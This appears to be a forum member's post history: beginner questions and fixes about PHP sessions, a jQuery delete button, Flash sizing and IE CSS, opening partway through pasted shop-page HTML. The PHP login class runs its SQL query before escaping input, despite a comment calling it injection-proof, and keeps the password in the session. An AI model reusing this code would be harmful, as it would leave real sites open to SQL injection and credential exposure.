src="includes/languages/english/images/buttons/button_add_to_cart1.gif" border="0" alt="" width="93" height="22" class="btn2"></a></div> <div class="fl_left"><a href="http://www.bootyflyjeans.com/wholesale/product_info.php?products_id=227?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4"><img src="includes/languages/english/images/buttons/button_details.gif" border="0" alt="" width="59" height="22" class="btn1"></a></div> </div> </td></tr> </table></td> </tr> </table> </td> </tr> </table> <!-- new_products_eof //--> </td></tr></table> </td> </tr> </table> </td> </tr> </table> <!-- body_eof //--> <!-- footer //--> </td></tr> <tr><td class="row_3"> <table cellpadding="0" cellspacing="0" border="0" class="footer" align="center"> <tr><td><table cellpadding="0" cellspacing="0" border="0" class="footer_td"><tr><td><img src="images/p1.gif" border="0" alt="" width="114" height="22"></td></tr></table></td> <td class="footer2_td"><span><a href="http://www.bootyflyjeans.com/wholesale/specials.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Specials</a> | <a href="http://www.bootyflyjeans.com/wholesale/advanced_search.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Advanced Search</a> | <a href="http://www.bootyflyjeans.com/wholesale/reviews.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Reviews</a> | <a href="http://www.bootyflyjeans.com/wholesale/create_account.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Create an Account</a> | <a href="http://www.bootyflyjeans.com/wholesale/login.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Log In</a></span><br>Copyright © 2010 <a href="http://www.bootyflyjeans.com/wholesale/index.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Booty Fly Jeans</a> <b><a href="http://www.bootyflyjeans.com/wholesale/privacy.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Privacy Notice</a> | <a href="http://www.bootyflyjeans.com/wholesale/conditions.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4">Conditions of Use</a></b></td> </tr> </table> </td></tr></table> </div><!-- footer_eof //--> </body> </html> I don't have the .htaccess file code anymore because i deleted it right away instead of copying it and pasting it for information purposes to others.
  15. thanks for your help guys it works great
  16. this kind of worked but it ruined in the css class that i was using.
  17. this is the full php code: <?php //echo $afterschool->table(); for ($i = 0; $i < $num_rows; $i++) { $student_name = mysql_result($result, $i, "student_name"); $address = mysql_result($result, $i, "address"); $city = mysql_result($result, $i, "city"); $home_phone = mysql_result($result, $i, "home_phone"); $emergency_phone = mysql_result($result, $i, "emergency_phone"); $student_name = mysql_result($result, $i, "student_name"); $id = mysql_result($result, $i, "id"); echo '<tbody> <tr> <td class="left"><img hspace="5" height="80" width="80" style="float: left;" alt="" src="images/avatar.jpg"> <ul class="circles"> <input type="hidden" id="user_id" name="user_id" value="' . $id . '"> <li>Student Id : ' . $id . '</li> <li>Student Name : ' . $student_name . '</li> <li>Address : ' . $address . '</li> <li>City: ' . $city . '</li> <li>Home Phone : ' . $home_phone . '</li> <li>Emergency Phone: ' . $emergency_phone . '</li> </ul></td> <td> <ul class="circles" style="float:left;"> <li><a href="#">Contracts</a></li> <li><a href="#">Print Invoice</a></li> </ul> </td> <td>Payment Due! </td> <td><a class="iconsmini" href="#"> <img src="images/icon-edit.gif" alt=""> </a> <a class="iconsmini" href="#"> <img src="images/icon-add.gif" alt=""> </a> <a class="iconsmini" href="#"> <img src="images/icon-success.gif" alt=""> </a> <a class="iconsmini" id="delete" href="#"> <img src="images/icon-delete.gif" alt=""> </a> </td> </tr> </tbody>'; } echo '<tfoot> <!-- Show All Students in AfterSchool --> <tr> <th colspan="8"> Search For: <input type="text" id="field" value="type here"> <a class="add" href="#">Go</a> </th> </tr> <tr> <td colspan="8"> <span style="float:left;">' . $nav_info . ' of ' . $total_recs . '</span> <!-- Pagination --> ' . $nav_links . ' </td> </tr> </tfoot>'; ?>
  18. Hey everyone, i am working on a site that uses JQuery and PHP. I have a PHP for loop that loops through my database and gets all the info. the JQuery is working fine but the problem is that it only works for the first record from the PHP loop. Can anyone help me make it work for all records? here is my JQuery code: <script type="text/javascript"> var user_id = document.getElementById("user_id").value $("#delete").click(function() { $.msgbox("Are you sure that you want to delete student?<br>id: "+user_id, { type: "confirm", buttons : [ {type: "submit", value: "Yes"}, {type: "cancel", value: "No"} ] }, function(result) { if(result){ $.ajax({ type: "GET", url: "ajax/afterschool/ajax_afterschool_delete.php", data: "delete="+ user_id, success: function(){ $.msgbox("<strong>You have successfully deleted student!</strong>", {type: "info"}); } }); }//end if result else{ $.msgbox("<strong>You have Not Deleted Anything!</strong>"); } }); }); </script> Here is part of my PHP code: echo '<tbody> <tr> <td class="left"><img hspace="5" height="80" width="80" style="float: left;" alt="" src="images/avatar.jpg"> <ul class="circles"> <input type="hidden" id="user_id" name="user_id" value="' . $id . '"> <li>Student Id : ' . $id . '</li> <li>Student Name : ' . $student_name . '</li> <li>Address : ' . $address . '</li> <li>City: ' . $city . '</li> <li>Home Phone : ' . $home_phone . '</li> <li>Emergency Phone: ' . $emergency_phone . '</li> </ul></td> <td> <ul class="circles" style="float:left;"> <li><a href="#">Contracts</a></li> <li><a href="#">Print Invoice</a></li> </ul> </td> <td>Payment Due! </td> <td><a class="iconsmini" href="#"> <img src="images/icon-edit.gif" alt=""> </a> <a class="iconsmini" href="#"> <img src="images/icon-add.gif" alt=""> </a> <a class="iconsmini" href="#"> <img src="images/icon-success.gif" alt=""> </a> <a class="iconsmini" id="delete" href="#"> <img src="images/icon-delete.gif" alt=""> </a> </td> </tr> </tbody>';
  19. yes i am using session_start() at the top of each page.....i found my problem! it turns out that when i put print_r($_SESSION); the sessions were working fine. the problem was that //This function will check if user is logged in function login_check(){ //CHECK LOGIN if($this->res!=1){ header('Location: login.php'); } needed me to use the actual $_SESSION['result'] instead of $this->res so the working code is: //This function will check if user is logged in function login_check(){ //CHECK LOGIN if($_SESSION['result']!=1){ header('Location: login.php'); }
  20. Hey everyone, i am working on a class for members section and i am having trouble with the sessions. They don't seem to be working because it's not storing the value of 1 in $_SESSION['res'] Can someone please help me out and let me know what i am doing wrong? here is the class: class member{ var $host; var $dbc; var $sel; var $db_user; var $db_pass; var $sql; var $res; var $user; var $pass; var $status; var $row; var $sql2; function __construct(){ $this->dbc = mysql_connect(DB_SERVER,DB_USER,DB_PASS) or die(mysql_error()); $this->sel = mysql_select_db(DB_DATABASE) or die(mysql_error()); } function login(){ if($_GET['login'] == "yes"){ $this->dbc = mysql_connect(DB_SERVER,DB_USER,DB_PASS) or die(mysql_error()); $this->sel = mysql_select_db(DB_DATABASE) or die(mysql_error()); //--build query $this->sql = mysql_query("SELECT count(id) FROM " . TABLE_ADMIN . " WHERE username='" . user . "' AND password='" . pass . "'"); //Hacker SQL injection Proof $this->user = mysql_escape_string(user); $this->pass = mysql_escape_string(pass); $this->res = mysql_result($this->sql,0); if($this->res!=1){ $this->status = '<div class="error"><span>Invalid Login!</span> <p> you have entered wrong username or password!</p></div>'; } else{ $_SESSION['username'] = $this->user; $_SESSION['password'] = $this->pass; $_SESSION['result'] = $this->res; header('Location:index.php'); } } } //This function will logout user function logout(){ if(isset($_GET['logout'])){ $_SESSION = array(); if($_COOKIE[session_name()]){ setcookie(session_name(),'', time()-4200,'/'); } session_destroy(); header('Location: login.php'); } } //This function will check if user is logged in function login_check(){ //CHECK LOGIN if($this->res!=1){ header('Location: login.php'); } } }//End member class
  21. i'm not sure what it could be.....i've been trying to figure this out but i think i'm going to have to resize the flash even though it will be a pain to do.
  22. hello everyone, I am having a problem with sizing in firefox. i am working on a website and i see the clock on the right hand side and the scroll under it fine but when i look at it in firefox, i see it really big and out of place. I'm not sure why, can anyone please help with this? here is my code: <script language="javascript"> if (AC_FL_RunContent == 0) { alert("This page requires AC_RunActiveContent.js."); } else { AC_FL_RunContent( 'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0', 'width', '350', 'height', '140', 'src', 'clock', 'quality', 'high', 'pluginspage', 'http://www.macromedia.com/go/getflashplayer', 'align', 'middle', 'play', 'true', 'loop', 'true', 'scale', 'showall', 'wmode', 'transparent', 'devicefont', 'false', 'id', 'clock', 'bgcolor', '#000000', 'name', 'clock', 'menu', 'true', 'allowFullScreen', 'false', 'allowScriptAccess','sameDomain', 'movie', 'clock', 'salign', '' ); //end AC code } </script> <noscript> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="350" height="140" id="clock" align="middle"> <param name="allowScriptAccess" value="sameDomain" /> <param name="allowFullScreen" value="false" /> <param name="movie" value="clock.swf" /><param name="quality" value="high" /><param name="wmode" value="transparent" /><param name="bgcolor" value="#000000" /> <embed src="clock.swf" quality="high" wmode="transparent" bgcolor="#000000" width="350" height="140" name="clock" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /> </object> </noscript>
  23. I am having a problem with my css code. The navigation won't display properly in IE but it's fine in firefox. i'm not sure what the problem is....can someone help me out with this? The site can be viewed here: http://betterorganicchoice.com/home.php I tried to use the following code but it doesn't seem to work. ul#navmenu li.activehome{ background-repeat:no-repeat; background-position:22em 8px; background-image:url(images/homeon.gif); } html>body ul#navmenu li.activehome{ background-position:22px 8px; }
  24. hey don't be sorry, i like to learn from my mistakes.....thanks for the info
×
×
  • Create New...